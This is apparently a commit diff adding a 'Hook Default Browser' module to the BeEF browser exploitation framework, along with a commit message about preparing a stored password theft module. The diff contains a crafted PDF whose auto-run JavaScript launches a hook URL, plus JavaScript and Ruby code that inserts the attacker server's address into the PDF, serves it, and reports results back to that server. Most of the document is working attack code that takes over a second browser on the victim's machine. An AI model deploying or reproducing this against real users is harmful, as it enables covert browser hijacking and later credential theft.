Updated a few module names

Added mailing list signup form to the advanced demo page in preperation for the stored password theft module

modules/host/hook_default_browser/bounce_to_ie.pdf

@@ -0,0 +1,79 @@
+%PDF-1.1
+1 0 obj
+<<
+	/Pages 3 0 R
+	/OpenAction 4 0 R
+	/Type /Catalog
+>>
+endobj
+2 0 obj
+<<
+	/Encoding /MacRomanEncoding
+	/Subtype /Type1
+	/BaseFont /Helvetica
+	/Type /Font
+	/Name /F1
+>>
+endobj
+3 0 obj
+<<
+	/Kids [ 5 0 R ]
+	/Type /Pages
+	/Count 1
+>>
+endobj
+4 0 obj
+<<
+	/S /JavaScript
+	/JS 6 0 R
+>>
+endobj
+5 0 obj
+<<
+	/MediaBox [ 0 0 795 842 ]
+	/Contents 7 0 R
+	/Parent 3 0 R
+	/Resources <<
+		/Font <<
+			/F1 2 0 R
+		>>
+		/ProcSet [ /PDF /Text ]
+	>>
+	/Type /Page
+>>
+endobj
+6 0 obj
+<<
+	/Length 1708
+>>stream
+app.launchURL("<hookURI>",true);	 
+endstream
+endobj
+7 0 obj
+<<
+	/Length 48
+>>stream
+BT
+
+ET
+endstream
+endobj
+xref
+0 8
+0000000000 65535 f
+0000000010 00000 n
+0000000087 00000 n
+0000000209 00000 n
+0000000278 00000 n
+0000000332 00000 n
+0000000513 00000 n
+0000002278 00000 n
+trailer
+<<
+	/Size 8
+	/ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ]
+	/Root 1 0 R
+>>
+startxref
+2381
+%%EOF

modules/host/hook_default_browser/command.js

@@ -0,0 +1,22 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	
+	var pdf_url =  'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
+	window.open( pdf_url, '_blank');
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
+});

modules/host/hook_default_browser/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        hook_default_browser:
+            enable: true
+            category: "Host"
+            name: "Hook Default Browser"
+            description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
+            authors: ["saafan"]
+            target:
+                working: ["All"]
+                user_notify: ["FF", "C"]

modules/host/hook_default_browser/module.rb

@@ -0,0 +1,67 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+class Hook_default_browser < BeEF::Core::Command
+
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+    return [
+        #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },
+    ]
+  end 
+
+  def pre_send
+
+    #Get the servers configurations.
+    configuration = BeEF::Core::Configuration.instance
+		
+		#The hook url to be replace the token in the original pdf file.
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+		
+		# A new pdf file containg the actual hook URI instead of the dummy token.
+		configured_hook_file = File.open("./modules/host/hook_default/bounce_to_ie_configured.pdf","w")
+		
+		# The original pdf file contains a token that will get replaced during the initialization with
+		# the actual hook URI of beef. Note that the hook URI is accessed via the DNS name.		
+		File.open('./modules/host/hook_default/bounce_to_ie.pdf',"r") { |original_hook_file|
+			original_hook_file.each_line { |line|				
+				# If the line includes the hook token, then replace it with the actual hook URI
+				if(line.include? '<hookURI>')
+					line = line.sub(/<hookURI>/, hook_uri)
+				end
+				#write the line to a new file
+				configured_hook_file.write(line)
+			}
+		}
+		
+		configured_hook_file.close()
+		
+		
+		#Bind the configured PDF file to the web server.
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/hook_default/bounce_to_ie_configured.pdf', '/report', 'pdf', -1); 
+    
+  end
+
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']          
+    
+    save content
+    #update_zombie!
+  end
+  
+end